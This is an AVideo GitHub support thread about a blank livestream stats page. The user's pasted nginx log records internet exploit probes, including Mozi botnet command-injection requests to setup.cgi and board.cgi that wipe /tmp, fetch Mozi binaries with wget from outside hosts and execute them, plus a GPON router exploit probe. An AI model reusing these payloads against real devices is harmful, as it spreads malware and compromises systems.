### ISSUE TITLE
When Trying to View LiveStream Site it resolves to a blank page.

### ISSUE THREAD

**Issue by youngprogrammer15** [WWBN/AVideo#3709]
I installed everything else and video uploads are working. I assume the issue comes from port 8080 being blocked by firewall so I unblocked it. Now when I view the live stream stat page its a blank page. The page loads and connects. How can I solve this?

**Comment by DanielnetoDotCom** [comment]
Check the avideo logs

**Comment by youngprogrammer15** [comment]
How would I go about finding my logs?

**Comment by akhilleusuggo** [comment]
https://github.com/WWBN/AVideo/wiki/How-to-find-errors-on-AVideo-Platform
Without detail hard to know what's wrong

**Comment by youngprogrammer15** [comment]
**Here are my logs:** 


2020/09/27 04:25:48 [error] 1779#0: *700 open() "/usr/local/nginx/html/admin-scripts.asp" failed (2: No such file or directory), client: 58.152.12.83, server: localhost, request: "GET /admin-scripts.asp HTTP/1.1", host: "35.224.230.58"
2020/09/27 04:25:48 [info] 1779#0: *700 client 58.152.12.83 closed keepalive connection
2020/09/27 05:08:31 [info] 1779#0: *701 client sent invalid host header while reading client request headers, client: 191.232.243.55, server: localhost, request: "GET /manager/html HTTP/1.1", host: ""
2020/09/27 05:37:32 [info] 1779#0: *702 client 209.17.96.250 closed keepalive connection
2020/09/27 06:25:06 [info] 1779#0: *704 client 73.149.46.162 closed keepalive connection
2020/09/27 06:58:30 [info] 1779#0: *705 client sent invalid host header while reading client request headers, client: 191.232.243.55, server: localhost, request: "GET /manager/html HTTP/1.1", host: ""
2020/09/27 08:25:39 [info] 1779#0: *706 client sent invalid host header while reading client request headers, client: 191.232.236.62, server: localhost, request: "GET /manager/html HTTP/1.1", host: ""
2020/09/27 08:36:13 [info] 1779#0: *707 client sent invalid host header while reading client request headers, client: 191.232.211.54, server: localhost, request: "GET /manager/html HTTP/1.1", host: ""
2020/09/27 08:42:05 [info] 1779#0: *708 client sent invalid host header while reading client request headers, client: 191.232.243.55, server: localhost, request: "GET /manager/html HTTP/1.1", host: ""
2020/09/27 09:23:40 [error] 1779#0: *709 open() "/usr/local/nginx/html/GponForm/diag_Form" failed (2: No such file or directory), client: 222.78.56.46, server: localhost, request: "POST /GponForm/diag_Form?images/ HTTP/1.1", host: "127.0.0.1:8080"
2020/09/27 09:23:40 [info] 1779#0: *709 client sent invalid method while reading client pipelined request line, client: 222.78.56.46, server: localhost, request: "h+/tmp/gpon8080&ipv=0"
2020/09/27 09:25:02 [error] 1779#0: *710 open() "/usr/local/nginx/html/setup.cgi" failed (2: No such file or directory), client: 49.143.32.6, server: localhost, request: "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0"
2020/09/27 10:04:37 [info] 1779#0: *711 client prematurely closed connection while reading client request line, client: 123.132.182.75, server: localhost, request: "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://123.132.182.75:49337/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron"
2020/09/27 10:07:11 [info] 1779#0: *712 recv() failed (104: Connection reset by peer) while waiting for request, client: 92.44.238.164, server: 0.0.0.0:8080
2020/09/27 10:07:14 [info] 1779#0: *713 client closed connection while waiting for request, client: 92.44.238.164, server: 0.0.0.0:8080
2020/09/27 10:07:58 [info] 1779#0: *714 client sent invalid host header while reading client request headers, client: 40.84.238.168, server: localhost, request: "GET /manager/html HTTP/1.1", host: ""
2020/09/27 10:17:41 [info] 1779#0: *715 client 193.118.53.194 closed keepalive connection
2020/09/27 10:22:38 [info] 1779#0: *716 client 37.203.240.202 closed keepalive connection
2020/09/27 11:28:27 [info] 1779#0: *717 client sent invalid host header while reading client request headers, client: 104.244.79.181, server: localhost, request: "GET /manager/html HTTP/1.1", host: ""
2020/09/27 11:55:16 [info] 1779#0: *718 client 84.54.147.233 closed keepalive connection
2020/09/27 11:59:35 [info] 1779#0: *719 client sent invalid host header while reading client request headers, client: 191.232.236.62, server: localhost, request: "GET /manager/html HTTP/1.1", host: ""
2020/09/27 12:18:40 [info] 1779#0: *720 client sent invalid method while reading client request line, client: 64.227.99.233, server: localhost, request: "85rD!N��4"
